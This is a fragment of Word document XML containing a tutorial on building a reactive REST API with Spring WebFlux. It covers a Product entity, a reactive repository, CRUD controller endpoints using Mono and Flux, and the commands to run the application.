    <w:p w14:paraId="4EEEE6D9"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3E1AE9AD"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29835955"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06D04C"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artifactId&gt;spring-boot-starter-data-mongodb&lt;/artifactId&gt; &lt;!-- For database interaction --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371B2DA"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2BE7145D"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 Optionally include an in-memory database or your actual DB --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04EBFB"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDDEDD" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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Gradle (build.gradle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBA697"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2D4B0"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mplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD611A4"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mplementation 'org.springframework.boot:spring-boot-starter-data-mongodb'  // If you're using MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FB924"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5F1E6E85" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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2. Create a Reactive Model (Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82D95B"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et's create a simple Product entity, which we will use as a model for our API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD94743"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import org.springframework.data.annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F8898" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2677EBFD"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Product {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5084C"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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C3F14"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String id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C9239"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599251C6"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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57F431" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123FDEC9"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Constructors, Getters, and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37527679"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Product(String id, String name, double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197D54C"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEC08A"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D58C1"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his.price = price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D92D028"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04488BE4" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2B58F5"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String getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10009283"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d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01016776"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2DEAD25D" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249511FB"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void setId(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF8126"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A380D"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07F5377C" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655E494A"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String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E9364"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED958AB"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632B5CFA" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119AE041"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void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D99D3A2"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158ECA2"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1B7AC338" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9FEFF1"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double getPrice() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4DE05"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price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C864E1E"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376FA8BE" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A964AD"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void setPrice(double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A883103"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his.price = price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD3D13"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2DACB47B"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55949D76" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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3. Create a Reactive Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41699C59"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se ReactiveCrudRepository or ReactiveMongoRepository for MongoDB or any other reactive database library, depending on your choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9FCC11"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repository.reactive.ReactiveCrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C645177" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F95F8ED"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interface ProductRepository extends ReactiveCrudRepository&lt;Product, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B8CDE"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19D7E25D" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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4. Create a Controller for Reactive API Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13C8BB"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Create a RestController that handles HTTP requests reactively. Spring WebFlux uses Mono (for a single result) and Flux (for multiple results) as return types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408513A"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20E6C0"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4134EF"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53987EDA"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C475CB8" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BCCB6B"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4BA22"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questMapping("/api/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5AAB4"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public class ProductController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA29B13" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C240004"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final ProductRepository productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C218AAB" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD1AD91"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC7FCC"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ProductController(ProductRepository productRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF9312"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his.productRepository = productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479EAD6"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3432F0A8" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21471980"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Get a single product by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA0D61"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D01FD2"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Product&gt; getProductById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061B679"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productRepository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA20B1B"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06911222" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067157A1"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Get all products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B7495"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F461B5"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Flux&lt;Product&gt; getAllProducts() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E550D9B"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productRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7DDA2"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02FE601B" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B98D86"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Add a new product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307743D8"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72911B"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Product&gt; createProduct(@RequestBody Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48359844"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productRepository.save(product);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F5247"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0BA44503" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F8480D"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Update a product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0EAE5"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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17703AAC"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Product&gt; updateProduct(@PathVariable String id, @RequestBody Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787860A"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productRepository.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E1842"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flatMap(existingProduct -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446561A9"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istingProduct.setName(product.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00606764"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istingProduct.setPrice(product.getPrice());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B1663"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productRepository.save(existingProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60468A23"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0D2E5570"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459064E1" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7AF89C"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Delete a product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA04F97"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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A224F"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Void&gt; deleteProduct(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2EAFE"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productRepository.deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DF840"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26C99142"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1DD65AEF" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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5. Explanation of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B4104"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents a single asynchronous value or an empty asynchronous result. It's used for endpoints that return a single object (e.g., fetching a single product by its ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA0728"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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents an asynchronous stream of 0 to N elements. It's used for endpoints that return multiple items (e.g., fetching all products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E12EB3"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this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9401A"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getProductById: Fetches a product by its ID and returns it as a Mono&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACEC54"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getAllProducts: Returns all products as a Flux&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F325E9"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createProduct: Accepts a POST request and saves a new product, returning a Mono&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30023BDB"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pdateProduct: Accepts a PUT request, updates an existing product, and returns the updated product wrapped in a Mono.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BEFCB9"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deleteProduct: Deletes a product by ID and returns a Mono&lt;Void&gt; to signify the completion of the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F23FF1" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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lastRenderedPageBreak/>
        <w:t>6. Running the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BC841"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Once you've set up your application, you can run it using the following command (if using Spring Boot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E5F4B"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vnw spring-boot:run   # For Maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEABFD9"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Or if you're using Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECECE90"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gradlew bootRun   # For Gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED71EE9"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Your application will be running on http://localhost:8080 by default, and you can test the endpoints via tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</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curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC9BE1E" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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7. Example Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F46E9"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/products – Fetch all products.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A03376"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/products/{id} – Fetch a product by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2EF0A"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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/products – Add a new product. (Request body contains product details)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF91CD1"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PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/products/{id} – Update a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D32AA9"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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/products/{id} – Delete a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111859BB" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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8. What Makes It Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E372795"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The database queries are executed asynchronously, and the application doesn't block the main thread while waiting for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6785D"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ctive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Mono and Flux are returned by the controller methods, indicating that the API will handle asynchronous processing of the requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E745DBB"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Backpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the number of emitted items exceeds the ability of the consumer to process them, backpressure is handled efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C8F86" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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9. Benefits of Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AD130"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Better scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux can handle many more concurrent requests because it doesn't block threads when waiting for I/O operations (such as database access, external HTTP calls, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617D92E"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Improved responsiveness</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can scale to handle high numbers of requests with low latency, which is ideal for modern applications requiring real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3A322"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Non-blocking architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It makes the system more efficient, especially when handling I/O-bound tasks, as threads are not blocked waiting for operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC63EFE" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B88FD"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his example demonstrates how to create a simple </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive REST API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Spring WebFlux. By leveraging Mono and Flux, we can process requests asynchronously, making the application more scalable and efficient compared to traditional blocking APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBA2C8"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46B2E1A">
          <v:rect id="_x0000_i2320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E609989" w14:textId="252FEDBF"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21" w:name="_Toc196308001"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you give an example of creating a simple controller using Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w14:paraId="0A8F1192" w14:textId="41EF3C4D" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9"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Certainly! Here's an example of creating a simple controller using Mono and Flux in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1B3F4" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD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 Set Up Spring WebFlux Dependency</w:t>
      </w:r>
    </w:p>
